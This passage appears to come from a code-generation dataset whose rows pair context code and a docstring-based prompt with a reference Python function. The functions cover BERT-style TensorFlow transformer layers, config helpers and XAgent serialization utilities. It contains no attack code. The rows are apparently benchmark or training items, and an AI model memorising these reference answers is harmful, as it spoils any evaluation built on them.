return output, embedding_table | Looks up words embeddings for id tensor. Args: input_ids: int32 Tensor of shape [batch_size, seq_length] containing word ids. vocab_size: int. Size of the embedding vocabulary. embedding_size: int. Width of the word embeddings. initializer_range: float. Embedding initialization range. word_embedding_name: string. Name of the embedding table. use_one_hot_embeddings: bool. If True, use one-hot method for word embeddings. If False, use `tf.nn.embedding_lookup()`. One hot is better for TPUs. Returns: float Tensor of shape [batch_size, seq_length, embedding_size]. |
6,217 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import math
import re
import numpy as np
import six
import tensorflow.compat.v1 as tf
from tensorflow.contrib import layers as contrib_layers
def layer_norm_and_dropout(input_tensor, dropout_prob, name=None):
"""Runs layer normalization followed by dropout."""
output_tensor = layer_norm(input_tensor, name)
output_tensor = dropout(output_tensor, dropout_prob)
return output_tensor
def create_initializer(initializer_range=0.02):
"""Creates a `truncated_normal_initializer` with the given range."""
return tf.truncated_normal_initializer(stddev=initializer_range)
def get_shape_list(tensor, expected_rank=None, name=None):
"""Returns a list of the shape of tensor, preferring static dimensions.
Args:
tensor: A tf.Tensor object to find the shape of.
expected_rank: (optional) int. The expected rank of `tensor`. If this is
specified and the `tensor` has a different rank, and exception will be
thrown.
name: Optional name of the tensor for the error message.
Returns:
A list of dimensions of the shape of tensor. All static dimensions will
be returned as python integers, and dynamic dimensions will be returned
as tf.Tensor scalars.
"""
if isinstance(tensor, np.ndarray) or isinstance(tensor, list):
shape = np.array(tensor).shape
if isinstance(expected_rank, six.integer_types):
assert len(shape) == expected_rank
elif expected_rank is not None:
assert len(shape) in expected_rank
return shape
if name is None:
name = tensor.name
if expected_rank is not None:
assert_rank(tensor, expected_rank, name)
shape = tensor.shape.as_list()
non_static_indexes = []
for (index, dim) in enumerate(shape):
if dim is None:
non_static_indexes.append(index)
if not non_static_indexes:
return shape
dyn_shape = tf.shape(tensor)
for index in non_static_indexes:
shape[index] = dyn_shape[index]
return shape
The provided code snippet includes necessary dependencies for implementing the `embedding_postprocessor` function. Write a Python function `def embedding_postprocessor(input_tensor, use_token_type=False, token_type_ids=None, token_type_vocab_size=16, token_type_embedding_name="token_type_embeddings", use_position_embeddings=True, position_embedding_name="position_embeddings", initializer_range=0.02, max_position_embeddings=512, dropout_prob=0.1)` to solve the following problem:
Performs various post-processing on a word embedding tensor. Args: input_tensor: float Tensor of shape [batch_size, seq_length, embedding_size]. use_token_type: bool. Whether to add embeddings for `token_type_ids`. token_type_ids: (optional) int32 Tensor of shape [batch_size, seq_length]. Must be specified if `use_token_type` is True. token_type_vocab_size: int. The vocabulary size of `token_type_ids`. token_type_embedding_name: string. The name of the embedding table variable for token type ids. use_position_embeddings: bool. Whether to add position embeddings for the position of each token in the sequence. position_embedding_name: string. The name of the embedding table variable for positional embeddings. initializer_range: float. Range of the weight initialization. max_position_embeddings: int. Maximum sequence length that might ever be used with this model. This can be longer than the sequence length of input_tensor, but cannot be shorter. dropout_prob: float. Dropout probability applied to the final output tensor. Returns: float tensor with same shape as `input_tensor`. Raises: ValueError: One of the tensor shapes or input values is invalid.
Here is the function:
def embedding_postprocessor(input_tensor,
use_token_type=False,
token_type_ids=None,
token_type_vocab_size=16,
token_type_embedding_name="token_type_embeddings",
use_position_embeddings=True,
position_embedding_name="position_embeddings",
initializer_range=0.02,
max_position_embeddings=512,
dropout_prob=0.1):
"""Performs various post-processing on a word embedding tensor.
Args:
input_tensor: float Tensor of shape [batch_size, seq_length,
embedding_size].
use_token_type: bool. Whether to add embeddings for `token_type_ids`.
token_type_ids: (optional) int32 Tensor of shape [batch_size, seq_length].
Must be specified if `use_token_type` is True.
token_type_vocab_size: int. The vocabulary size of `token_type_ids`.
token_type_embedding_name: string. The name of the embedding table variable
for token type ids.
use_position_embeddings: bool. Whether to add position embeddings for the
position of each token in the sequence.
position_embedding_name: string. The name of the embedding table variable
for positional embeddings.
initializer_range: float. Range of the weight initialization.
max_position_embeddings: int. Maximum sequence length that might ever be
used with this model. This can be longer than the sequence length of
input_tensor, but cannot be shorter.
dropout_prob: float. Dropout probability applied to the final output tensor.
Returns:
float tensor with same shape as `input_tensor`.
Raises:
ValueError: One of the tensor shapes or input values is invalid.
"""
input_shape = get_shape_list(input_tensor, expected_rank=3)
batch_size = input_shape[0]
seq_length = input_shape[1]
width = input_shape[2]
output = input_tensor
if use_token_type:
if token_type_ids is None:
raise ValueError("`token_type_ids` must be specified if"
"`use_token_type` is True.")
token_type_table = tf.get_variable(
name=token_type_embedding_name,
shape=[token_type_vocab_size, width],
initializer=create_initializer(initializer_range))
# This vocab will be small so we always do one-hot here, since it is always
# faster for a small vocabulary.
flat_token_type_ids = tf.reshape(token_type_ids, [-1])
one_hot_ids = tf.one_hot(flat_token_type_ids, depth=token_type_vocab_size)
token_type_embeddings = tf.matmul(one_hot_ids, token_type_table)
token_type_embeddings = tf.reshape(token_type_embeddings,
[batch_size, seq_length, width])
output += token_type_embeddings
if use_position_embeddings:
assert_op = tf.assert_less_equal(seq_length, max_position_embeddings)
with tf.control_dependencies([assert_op]):
full_position_embeddings = tf.get_variable(
name=position_embedding_name,
shape=[max_position_embeddings, width],
initializer=create_initializer(initializer_range))
# Since the position embedding table is a learned variable, we create it
# using a (long) sequence length `max_position_embeddings`. The actual
# sequence length might be shorter than this, for faster training of
# tasks that do not have long sequences.
#
# So `full_position_embeddings` is effectively an embedding table
# for position [0, 1, 2, ..., max_position_embeddings-1], and the current
# sequence has positions [0, 1, 2, ... seq_length-1], so we can just
# perform a slice.
position_embeddings = tf.slice(full_position_embeddings, [0, 0],
[seq_length, -1])
num_dims = len(output.shape.as_list())
# Only the last two dimensions are relevant (`seq_length` and `width`), so
# we broadcast among the first dimensions, which is typically just
# the batch size.
position_broadcast_shape = []
for _ in range(num_dims - 2):
position_broadcast_shape.append(1)
position_broadcast_shape.extend([seq_length, width])
position_embeddings = tf.reshape(position_embeddings,
position_broadcast_shape)
output += position_embeddings
output = layer_norm_and_dropout(output, dropout_prob)
return output | Performs various post-processing on a word embedding tensor. Args: input_tensor: float Tensor of shape [batch_size, seq_length, embedding_size]. use_token_type: bool. Whether to add embeddings for `token_type_ids`. token_type_ids: (optional) int32 Tensor of shape [batch_size, seq_length]. Must be specified if `use_token_type` is True. token_type_vocab_size: int. The vocabulary size of `token_type_ids`. token_type_embedding_name: string. The name of the embedding table variable for token type ids. use_position_embeddings: bool. Whether to add position embeddings for the position of each token in the sequence. position_embedding_name: string. The name of the embedding table variable for positional embeddings. initializer_range: float. Range of the weight initialization. max_position_embeddings: int. Maximum sequence length that might ever be used with this model. This can be longer than the sequence length of input_tensor, but cannot be shorter. dropout_prob: float. Dropout probability applied to the final output tensor. Returns: float tensor with same shape as `input_tensor`. Raises: ValueError: One of the tensor shapes or input values is invalid. |
6,218 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import math
import re
import numpy as np
import six
import tensorflow.compat.v1 as tf
from tensorflow.contrib import layers as contrib_layers
def get_shape_list(tensor, expected_rank=None, name=None):
"""Returns a list of the shape of tensor, preferring static dimensions.
Args:
tensor: A tf.Tensor object to find the shape of.
expected_rank: (optional) int. The expected rank of `tensor`. If this is
specified and the `tensor` has a different rank, and exception will be
thrown.
name: Optional name of the tensor for the error message.
Returns:
A list of dimensions of the shape of tensor. All static dimensions will
be returned as python integers, and dynamic dimensions will be returned
as tf.Tensor scalars.
"""
if isinstance(tensor, np.ndarray) or isinstance(tensor, list):
shape = np.array(tensor).shape
if isinstance(expected_rank, six.integer_types):
assert len(shape) == expected_rank
elif expected_rank is not None:
assert len(shape) in expected_rank
return shape
if name is None:
name = tensor.name
if expected_rank is not None:
assert_rank(tensor, expected_rank, name)
shape = tensor.shape.as_list()
non_static_indexes = []
for (index, dim) in enumerate(shape):
if dim is None:
non_static_indexes.append(index)
if not non_static_indexes:
return shape
dyn_shape = tf.shape(tensor)
for index in non_static_indexes:
shape[index] = dyn_shape[index]
return shape
The provided code snippet includes necessary dependencies for implementing the `create_attention_mask_from_input_mask` function. Write a Python function `def create_attention_mask_from_input_mask(from_tensor, to_mask)` to solve the following problem:
Create 3D attention mask from a 2D tensor mask. Args: from_tensor: 2D or 3D Tensor of shape [batch_size, from_seq_length, ...]. to_mask: int32 Tensor of shape [batch_size, to_seq_length]. Returns: float Tensor of shape [batch_size, from_seq_length, to_seq_length].
Here is the function:
def create_attention_mask_from_input_mask(from_tensor, to_mask):
"""Create 3D attention mask from a 2D tensor mask.
Args:
from_tensor: 2D or 3D Tensor of shape [batch_size, from_seq_length, ...].
to_mask: int32 Tensor of shape [batch_size, to_seq_length].
Returns:
float Tensor of shape [batch_size, from_seq_length, to_seq_length].
"""
from_shape = get_shape_list(from_tensor, expected_rank=[2, 3])
batch_size = from_shape[0]
from_seq_length = from_shape[1]
to_shape = get_shape_list(to_mask, expected_rank=2)
to_seq_length = to_shape[1]
to_mask = tf.cast(
tf.reshape(to_mask, [batch_size, 1, to_seq_length]), tf.float32)
# We don't assume that `from_tensor` is a mask (although it could be). We
# don't actually care if we attend *from* padding tokens (only *to* padding)
# tokens so we create a tensor of all ones.
#
# `broadcast_ones` = [batch_size, from_seq_length, 1]
broadcast_ones = tf.ones(
shape=[batch_size, from_seq_length, 1], dtype=tf.float32)
# Here we broadcast along two dimensions to create the mask.
mask = broadcast_ones * to_mask
return mask | Create 3D attention mask from a 2D tensor mask. Args: from_tensor: 2D or 3D Tensor of shape [batch_size, from_seq_length, ...]. to_mask: int32 Tensor of shape [batch_size, to_seq_length]. Returns: float Tensor of shape [batch_size, from_seq_length, to_seq_length]. |
6,219 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import math
import re
import numpy as np
import six
import tensorflow.compat.v1 as tf
from tensorflow.contrib import layers as contrib_layers
def gelu(input_tensor):
"""Gaussian Error Linear Unit.
This is a smoother version of the RELU.
Original paper: https://arxiv.org/abs/1606.08415
Args:
input_tensor: float Tensor to perform activation.
Returns:
`input_tensor` with the GELU activation applied.
"""
cdf = 0.5 * (1.0 + tf.math.erf(input_tensor / tf.sqrt(2.0)))
return input_tensor * cdf
def dropout(input_tensor, dropout_prob):
"""Perform dropout.
Args:
input_tensor: float Tensor.
dropout_prob: Python float. The probability of dropping out a value (NOT of
*keeping* a dimension as in `tf.nn.dropout`).
Returns:
A version of `input_tensor` with dropout applied.
"""
if dropout_prob is None or dropout_prob == 0.0:
return input_tensor
output = tf.nn.dropout(input_tensor, 1.0 - dropout_prob)
return output
def layer_norm(input_tensor, name=None):
"""Run layer normalization on the last dimension of the tensor."""
return contrib_layers.layer_norm(
inputs=input_tensor, begin_norm_axis=-1, begin_params_axis=-1, scope=name)
def create_initializer(initializer_range=0.02):
"""Creates a `truncated_normal_initializer` with the given range."""
return tf.truncated_normal_initializer(stddev=initializer_range)
def attention_layer(from_tensor,
to_tensor,
attention_mask=None,
num_attention_heads=1,
size_per_head=512,
query_act=None,
key_act=None,
value_act=None,
attention_probs_dropout_prob=0.0,
initializer_range=0.02,
do_return_2d_tensor=False,
batch_size=None,
from_seq_length=None,
to_seq_length=None):
"""Performs multi-headed attention from `from_tensor` to `to_tensor`.
This is an implementation of multi-headed attention based on "Attention
is all you Need". If `from_tensor` and `to_tensor` are the same, then
this is self-attention. Each timestep in `from_tensor` attends to the
corresponding sequence in `to_tensor`, and returns a fixed-with vector.
This function first projects `from_tensor` into a "query" tensor and
`to_tensor` into "key" and "value" tensors. These are (effectively) a list
of tensors of length `num_attention_heads`, where each tensor is of shape
[batch_size, seq_length, size_per_head].
Then, the query and key tensors are dot-producted and scaled. These are
softmaxed to obtain attention probabilities. The value tensors are then
interpolated by these probabilities, then concatenated back to a single
tensor and returned.
In practice, the multi-headed attention are done with transposes and
reshapes rather than actual separate tensors.
Args:
from_tensor: float Tensor of shape [batch_size, from_seq_length,
from_width].
to_tensor: float Tensor of shape [batch_size, to_seq_length, to_width].
attention_mask: (optional) int32 Tensor of shape [batch_size,
from_seq_length, to_seq_length]. The values should be 1 or 0. The
attention scores will effectively be set to -infinity for any positions in
the mask that are 0, and will be unchanged for positions that are 1.
num_attention_heads: int. Number of attention heads.
size_per_head: int. Size of each attention head.
query_act: (optional) Activation function for the query transform.
key_act: (optional) Activation function for the key transform.
value_act: (optional) Activation function for the value transform.
attention_probs_dropout_prob: (optional) float. Dropout probability of the
attention probabilities.
initializer_range: float. Range of the weight initializer.
do_return_2d_tensor: bool. If True, the output will be of shape [batch_size
* from_seq_length, num_attention_heads * size_per_head]. If False, the
output will be of shape [batch_size, from_seq_length, num_attention_heads
* size_per_head].
batch_size: (Optional) int. If the input is 2D, this might be the batch size
of the 3D version of the `from_tensor` and `to_tensor`.
from_seq_length: (Optional) If the input is 2D, this might be the seq length
of the 3D version of the `from_tensor`.
to_seq_length: (Optional) If the input is 2D, this might be the seq length
of the 3D version of the `to_tensor`.
Returns:
float Tensor of shape [batch_size, from_seq_length,
num_attention_heads * size_per_head]. (If `do_return_2d_tensor` is
true, this will be of shape [batch_size * from_seq_length,
num_attention_heads * size_per_head]).
Raises:
ValueError: Any of the arguments or tensor shapes are invalid.
"""
def transpose_for_scores(input_tensor, batch_size, num_attention_heads,
seq_length, width):
output_tensor = tf.reshape(
input_tensor, [batch_size, seq_length, num_attention_heads, width])
output_tensor = tf.transpose(output_tensor, [0, 2, 1, 3])
return output_tensor
from_shape = get_shape_list(from_tensor, expected_rank=[2, 3])
to_shape = get_shape_list(to_tensor, expected_rank=[2, 3])
if len(from_shape) != len(to_shape):
raise ValueError(
"The rank of `from_tensor` must match the rank of `to_tensor`.")
if len(from_shape) == 3:
batch_size = from_shape[0]
from_seq_length = from_shape[1]
to_seq_length = to_shape[1]
elif len(from_shape) == 2:
if batch_size is None or from_seq_length is None or to_seq_length is None:
raise ValueError(
"When passing in rank 2 tensors to attention_layer, the values "
"for `batch_size`, `from_seq_length`, and `to_seq_length` "
"must all be specified.")
# Scalar dimensions referenced here:
# B = batch size (number of sequences)
# F = `from_tensor` sequence length
# T = `to_tensor` sequence length
# N = `num_attention_heads`
# H = `size_per_head`
from_tensor_2d = reshape_to_matrix(from_tensor)
to_tensor_2d = reshape_to_matrix(to_tensor)
# `query_layer` = [B*F, N*H]
query_layer = tf.layers.dense(
from_tensor_2d,
num_attention_heads * size_per_head,
activation=query_act,
name="query",
kernel_initializer=create_initializer(initializer_range))
# `key_layer` = [B*T, N*H]
key_layer = tf.layers.dense(
to_tensor_2d,
num_attention_heads * size_per_head,
activation=key_act,
name="key",
kernel_initializer=create_initializer(initializer_range))
# `value_layer` = [B*T, N*H]
value_layer = tf.layers.dense(
to_tensor_2d,
num_attention_heads * size_per_head,
activation=value_act,
name="value",
kernel_initializer=create_initializer(initializer_range))
# `query_layer` = [B, N, F, H]
query_layer = transpose_for_scores(query_layer, batch_size,
num_attention_heads, from_seq_length,
size_per_head)
# `key_layer` = [B, N, T, H]
key_layer = transpose_for_scores(key_layer, batch_size, num_attention_heads,
to_seq_length, size_per_head)
# Take the dot product between "query" and "key" to get the raw
# attention scores.
# `attention_scores` = [B, N, F, T]
attention_scores = tf.matmul(query_layer, key_layer, transpose_b=True)
attention_scores = tf.multiply(attention_scores,
1.0 / math.sqrt(float(size_per_head)))
if attention_mask is not None:
# `attention_mask` = [B, 1, F, T]
attention_mask = tf.expand_dims(attention_mask, axis=[1])
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
adder = (1.0 - tf.cast(attention_mask, tf.float32)) * -10000.0
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
attention_scores += adder
# Normalize the attention scores to probabilities.
# `attention_probs` = [B, N, F, T]
attention_probs = tf.nn.softmax(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = dropout(attention_probs, attention_probs_dropout_prob)
# `value_layer` = [B, T, N, H]
value_layer = tf.reshape(
value_layer,
[batch_size, to_seq_length, num_attention_heads, size_per_head])
# `value_layer` = [B, N, T, H]
value_layer = tf.transpose(value_layer, [0, 2, 1, 3])
# `context_layer` = [B, N, F, H]
context_layer = tf.matmul(attention_probs, value_layer)
# `context_layer` = [B, F, N, H]
context_layer = tf.transpose(context_layer, [0, 2, 1, 3])
if do_return_2d_tensor:
# `context_layer` = [B*F, N*H]
context_layer = tf.reshape(
context_layer,
[batch_size * from_seq_length, num_attention_heads * size_per_head])
else:
# `context_layer` = [B, F, N*H]
context_layer = tf.reshape(
context_layer,
[batch_size, from_seq_length, num_attention_heads * size_per_head])
return context_layer, attention_probs
def get_shape_list(tensor, expected_rank=None, name=None):
"""Returns a list of the shape of tensor, preferring static dimensions.
Args:
tensor: A tf.Tensor object to find the shape of.
expected_rank: (optional) int. The expected rank of `tensor`. If this is
specified and the `tensor` has a different rank, and exception will be
thrown.
name: Optional name of the tensor for the error message.
Returns:
A list of dimensions of the shape of tensor. All static dimensions will
be returned as python integers, and dynamic dimensions will be returned
as tf.Tensor scalars.
"""
if isinstance(tensor, np.ndarray) or isinstance(tensor, list):
shape = np.array(tensor).shape
if isinstance(expected_rank, six.integer_types):
assert len(shape) == expected_rank
elif expected_rank is not None:
assert len(shape) in expected_rank
return shape
if name is None:
name = tensor.name
if expected_rank is not None:
assert_rank(tensor, expected_rank, name)
shape = tensor.shape.as_list()
non_static_indexes = []
for (index, dim) in enumerate(shape):
if dim is None:
non_static_indexes.append(index)
if not non_static_indexes:
return shape
dyn_shape = tf.shape(tensor)
for index in non_static_indexes:
shape[index] = dyn_shape[index]
return shape
def reshape_to_matrix(input_tensor):
"""Reshapes a >= rank 2 tensor to a rank 2 tensor (i.e., a matrix)."""
ndims = input_tensor.shape.ndims
if ndims < 2:
raise ValueError("Input tensor must have at least rank 2. Shape = %s" %
(input_tensor.shape))
if ndims == 2:
return input_tensor
width = input_tensor.shape[-1]
output_tensor = tf.reshape(input_tensor, [-1, width])
return output_tensor
def reshape_from_matrix(output_tensor, orig_shape_list):
"""Reshapes a rank 2 tensor back to its original rank >= 2 tensor."""
if len(orig_shape_list) == 2:
return output_tensor
output_shape = get_shape_list(output_tensor)
orig_dims = orig_shape_list[0:-1]
width = output_shape[-1]
return tf.reshape(output_tensor, orig_dims + [width])
The provided code snippet includes necessary dependencies for implementing the `transformer_model` function. Write a Python function `def transformer_model(input_tensor, attention_mask=None, hidden_size=768, num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072, intermediate_act_fn=gelu, hidden_dropout_prob=0.1, attention_probs_dropout_prob=0.1, initializer_range=0.02, do_return_all_layers=False)` to solve the following problem:
Multi-headed, multi-layer Transformer from "Attention is All You Need". This is almost an exact implementation of the original Transformer encoder. See the original paper: https://arxiv.org/abs/1706.03762 Also see: https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/models/transformer.py Args: input_tensor: float Tensor of shape [batch_size, seq_length, hidden_size]. attention_mask: (optional) int32 Tensor of shape [batch_size, seq_length, seq_length], with 1 for positions that can be attended to and 0 in positions that should not be. hidden_size: int. Hidden size of the Transformer. num_hidden_layers: int. Number of layers (blocks) in the Transformer. num_attention_heads: int. Number of attention heads in the Transformer. intermediate_size: int. The size of the "intermediate" (a.k.a., feed forward) layer. intermediate_act_fn: function. The non-linear activation function to apply to the output of the intermediate/feed-forward layer. hidden_dropout_prob: float. Dropout probability for the hidden layers. attention_probs_dropout_prob: float. Dropout probability of the attention probabilities. initializer_range: float. Range of the initializer (stddev of truncated normal). do_return_all_layers: Whether to also return all layers or just the final layer. Returns: float Tensor of shape [batch_size, seq_length, hidden_size], the final hidden layer of the Transformer. Raises: ValueError: A Tensor shape or parameter is invalid.
Here is the function:
def transformer_model(input_tensor,
attention_mask=None,
hidden_size=768,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
intermediate_act_fn=gelu,
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
initializer_range=0.02,
do_return_all_layers=False):
"""Multi-headed, multi-layer Transformer from "Attention is All You Need".
This is almost an exact implementation of the original Transformer encoder.
See the original paper:
https://arxiv.org/abs/1706.03762
Also see:
https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/models/transformer.py
Args:
input_tensor: float Tensor of shape [batch_size, seq_length, hidden_size].
attention_mask: (optional) int32 Tensor of shape [batch_size, seq_length,
seq_length], with 1 for positions that can be attended to and 0 in
positions that should not be.
hidden_size: int. Hidden size of the Transformer.
num_hidden_layers: int. Number of layers (blocks) in the Transformer.
num_attention_heads: int. Number of attention heads in the Transformer.
intermediate_size: int. The size of the "intermediate" (a.k.a., feed
forward) layer.
intermediate_act_fn: function. The non-linear activation function to apply
to the output of the intermediate/feed-forward layer.
hidden_dropout_prob: float. Dropout probability for the hidden layers.
attention_probs_dropout_prob: float. Dropout probability of the attention
probabilities.
initializer_range: float. Range of the initializer (stddev of truncated
normal).
do_return_all_layers: Whether to also return all layers or just the final
layer.
Returns:
float Tensor of shape [batch_size, seq_length, hidden_size], the final
hidden layer of the Transformer.
Raises:
ValueError: A Tensor shape or parameter is invalid.
"""
if hidden_size % num_attention_heads != 0:
raise ValueError(
"The hidden size (%d) is not a multiple of the number of attention "
"heads (%d)" % (hidden_size, num_attention_heads))
attention_head_size = int(hidden_size / num_attention_heads)
input_shape = get_shape_list(input_tensor, expected_rank=3)
batch_size = input_shape[0]
seq_length = input_shape[1]
input_width = input_shape[2]
# The Transformer performs sum residuals on all layers so the input needs
# to be the same as the hidden size.
if input_width != hidden_size:
raise ValueError("The width of the input tensor (%d) != hidden size (%d)" %
(input_width, hidden_size))
# We keep the representation as a 2D tensor to avoid re-shaping it back and
# forth from a 3D tensor to a 2D tensor. Re-shapes are normally free on
# the GPU/CPU but may not be free on the TPU, so we want to minimize them to
# help the optimizer.
prev_output = reshape_to_matrix(input_tensor)
attn_maps = []
all_layer_outputs = []
for layer_idx in range(num_hidden_layers):
with tf.variable_scope("layer_%d" % layer_idx):
with tf.variable_scope("attention"):
attention_heads = []
with tf.variable_scope("self"):
attention_head, probs = attention_layer(
from_tensor=prev_output,
to_tensor=prev_output,
attention_mask=attention_mask,
num_attention_heads=num_attention_heads,
size_per_head=attention_head_size,
attention_probs_dropout_prob=attention_probs_dropout_prob,
initializer_range=initializer_range,
do_return_2d_tensor=True,
batch_size=batch_size,
from_seq_length=seq_length,
to_seq_length=seq_length)
attention_heads.append(attention_head)
attn_maps.append(probs)
attention_output = None
if len(attention_heads) == 1:
attention_output = attention_heads[0]
else:
# In the case where we have other sequences, we just concatenate
# them to the self-attention head before the projection.
attention_output = tf.concat(attention_heads, axis=-1)
# Run a linear projection of `hidden_size` then add a residual
# with `layer_input`.
with tf.variable_scope("output"):
attention_output = tf.layers.dense(
attention_output,
hidden_size,
kernel_initializer=create_initializer(initializer_range))
attention_output = dropout(attention_output, hidden_dropout_prob)
attention_output = layer_norm(attention_output + prev_output)
# The activation is only applied to the "intermediate" hidden layer.
with tf.variable_scope("intermediate"):
intermediate_output = tf.layers.dense(
attention_output,
intermediate_size,
activation=intermediate_act_fn,
kernel_initializer=create_initializer(initializer_range))
# Down-project back to `hidden_size` then add the residual.
with tf.variable_scope("output"):
prev_output = tf.layers.dense(
intermediate_output,
hidden_size,
kernel_initializer=create_initializer(initializer_range))
prev_output = dropout(prev_output, hidden_dropout_prob)
prev_output = layer_norm(prev_output + attention_output)
all_layer_outputs.append(prev_output)
attn_maps = tf.stack(attn_maps, 0)
if do_return_all_layers:
return tf.stack([reshape_from_matrix(layer, input_shape)
for layer in all_layer_outputs], 0), attn_maps
else:
return reshape_from_matrix(prev_output, input_shape), attn_maps | Multi-headed, multi-layer Transformer from "Attention is All You Need". This is almost an exact implementation of the original Transformer encoder. See the original paper: https://arxiv.org/abs/1706.03762 Also see: https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/models/transformer.py Args: input_tensor: float Tensor of shape [batch_size, seq_length, hidden_size]. attention_mask: (optional) int32 Tensor of shape [batch_size, seq_length, seq_length], with 1 for positions that can be attended to and 0 in positions that should not be. hidden_size: int. Hidden size of the Transformer. num_hidden_layers: int. Number of layers (blocks) in the Transformer. num_attention_heads: int. Number of attention heads in the Transformer. intermediate_size: int. The size of the "intermediate" (a.k.a., feed forward) layer. intermediate_act_fn: function. The non-linear activation function to apply to the output of the intermediate/feed-forward layer. hidden_dropout_prob: float. Dropout probability for the hidden layers. attention_probs_dropout_prob: float. Dropout probability of the attention probabilities. initializer_range: float. Range of the initializer (stddev of truncated normal). do_return_all_layers: Whether to also return all layers or just the final layer. Returns: float Tensor of shape [batch_size, seq_length, hidden_size], the final hidden layer of the Transformer. Raises: ValueError: A Tensor shape or parameter is invalid. |
6,220 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import pickle
import sys
import tensorflow.compat.v1 as tf
def load_pickle(path):
with tf.io.gfile.GFile(path, "rb") as f:
return pickle.load(f) | null |
6,221 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import pickle
import sys
import tensorflow.compat.v1 as tf
The provided code snippet includes necessary dependencies for implementing the `nest_dict` function. Write a Python function `def nest_dict(d, prefixes, delim="_")` to solve the following problem:
Go from {prefix_key: value} to {prefix: {key: value}}.
Here is the function:
def nest_dict(d, prefixes, delim="_"):
"""Go from {prefix_key: value} to {prefix: {key: value}}."""
nested = {}
for k, v in d.items():
for prefix in prefixes:
if k.startswith(prefix + delim):
if prefix not in nested:
nested[prefix] = {}
nested[prefix][k.split(delim, 1)[1]] = v
else:
nested[k] = v
return nested | Go from {prefix_key: value} to {prefix: {key: value}}. |
6,222 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import re
import time
import tensorflow.compat.v1 as tf
from model import modeling
from util import utils
def secs_to_str(secs):
s = str(datetime.timedelta(seconds=int(round(secs))))
s = re.sub("^0:", "", s)
s = re.sub("^0", "", s)
s = re.sub("^0:", "", s)
s = re.sub("^0", "", s)
return s | null |
6,223 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import re
import time
import tensorflow.compat.v1 as tf
from model import modeling
from util import utils
The provided code snippet includes necessary dependencies for implementing the `get_bert_config` function. Write a Python function `def get_bert_config(config)` to solve the following problem:
Get model hyperparameters based on a pretraining/finetuning config
Here is the function:
def get_bert_config(config):
"""Get model hyperparameters based on a pretraining/finetuning config"""
if config.model_size == "large":
args = {"hidden_size": 1024, "num_hidden_layers": 24}
elif config.model_size == "base":
args = {"hidden_size": 768, "num_hidden_layers": 12}
elif config.model_size == "small":
args = {"hidden_size": 256, "num_hidden_layers": 12}
else:
raise ValueError("Unknown model size", config.model_size)
args["vocab_size"] = config.vocab_size
args.update(**config.model_hparam_overrides)
# by default the ff size and num attn heads are determined by the hidden size
args["num_attention_heads"] = max(1, args["hidden_size"] // 64)
args["intermediate_size"] = 4 * args["hidden_size"]
args.update(**config.model_hparam_overrides)
return modeling.BertConfig.from_dict(args) | Get model hyperparameters based on a pretraining/finetuning config |
6,224 | from contextlib import contextmanager
import datetime
import os
import time
import json
import re
from colorama import Fore
from XAgent.workflow.base_query import AutoGPTQuery
from XAgent.config import XAgentConfig
from XAgentServer.database.connect import SessionLocal
from XAgentServer.loggers.logs import Logger
from XAgentServer.models.recorder import XAgentRunningRecord
from XAgentServer.application.cruds.recorder import RunningRecordCRUD
from XAgentServer.enums.recorder_type import RecorderTypeEnum
The provided code snippet includes necessary dependencies for implementing the `dump_common_things` function. Write a Python function `def dump_common_things(object)` to solve the following problem:
common
Here is the function:
def dump_common_things(object):
"""common"""
if type(object) in [str, int, float, bool]:
return object
if isinstance(object, dict):
return {dump_common_things(key): dump_common_things(value) for key, value in object.items()}
if isinstance(object, list):
return [dump_common_things(cont) for cont in object]
method = getattr(object, 'to_json', None)
if callable(method):
return method() | common |
6,225 | from contextlib import contextmanager
import datetime
import os
import time
import json
import re
from colorama import Fore
from XAgent.workflow.base_query import AutoGPTQuery
from XAgent.config import XAgentConfig
from XAgentServer.database.connect import SessionLocal
from XAgentServer.loggers.logs import Logger
from XAgentServer.models.recorder import XAgentRunningRecord
from XAgentServer.application.cruds.recorder import RunningRecordCRUD
from XAgentServer.enums.recorder_type import RecorderTypeEnum
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
The provided code snippet includes necessary dependencies for implementing the `get_db` function. Write a Python function `def get_db()` to solve the following problem:
Provide a transactional scope around a series of operations.
Here is the function:
def get_db():
"""
Provide a transactional scope around a series of operations.
"""
session = SessionLocal()
try:
yield session
session.commit()
except:
session.rollback()
raise
finally:
session.close() | Provide a transactional scope around a series of operations. |
6,226 | import os
import time
import json
import yaml
import uuid
import logging
from copy import deepcopy
from colorama import Fore, Style
from XAgent.logs import logger
from XAgent.workflow.base_query import AutoGPTQuery
from XAgent.config import XAgentConfig, CONFIG
The provided code snippet includes necessary dependencies for implementing the `dump_common_things` function. Write a Python function `def dump_common_things(object)` to solve the following problem:
Serialize commonly used data types, like str, int, float, bool, dictionaries, and lists. Args: object (Any): The object to serialize. Returns: object: The cpickled object.
Here is the function:
def dump_common_things(object):
"""
Serialize commonly used data types, like str, int, float, bool, dictionaries, and lists.
Args:
object (Any): The object to serialize.
Returns:
object: The cpickled object.
"""
if type(object) in [str, int, float, bool]:
return object
if type(object) == dict:
return {dump_common_things(key): dump_common_things(value) for key, value in object.items()}
if type(object) == list:
return [dump_common_things(cont) for cont in object]
method = getattr(object, 'to_json', None)
if callable(method):
return method() | Serialize commonly used data types, like str, int, float, bool, dictionaries, and lists. Args: object (Any): The object to serialize. Returns: object: The cpickled object. |
6,227 | import logging
import os
import random
import re
import time
import json
import abc
from logging import LogRecord
